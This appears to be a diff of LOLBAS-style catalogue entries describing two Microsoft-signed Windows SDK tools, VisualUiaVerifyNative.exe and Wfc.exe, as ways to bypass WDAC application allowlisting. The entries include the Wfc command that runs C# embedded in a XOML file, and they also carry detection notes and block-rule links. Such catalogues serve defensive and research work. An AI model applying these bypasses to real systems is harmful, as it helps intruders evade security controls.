---
|
||||
---
|
||||
Name: VisualUiaVerifyNative.exe
|
||||
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: VisualUiaVerifyNative.exe
|
||||
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
|
||||
- Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
|
||||
Acknowledgement:
|
||||
- Person: Lee Christensen
|
||||
Handle: '@tifkin'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -1,28 +1,28 @@
|
||||
---
|
||||
Name: Wfc.exe
|
||||
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: wfc.exe c:\path\to\test.xoml
|
||||
Description: Execute arbitrary C# code embedded in a XOML file.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
|
||||
Code_Sample:
|
||||
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
Name: Wfc.exe
|
||||
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: wfc.exe c:\path\to\test.xoml
|
||||
Description: Execute arbitrary C# code embedded in a XOML file.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
|
||||
Code_Sample:
|
||||
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user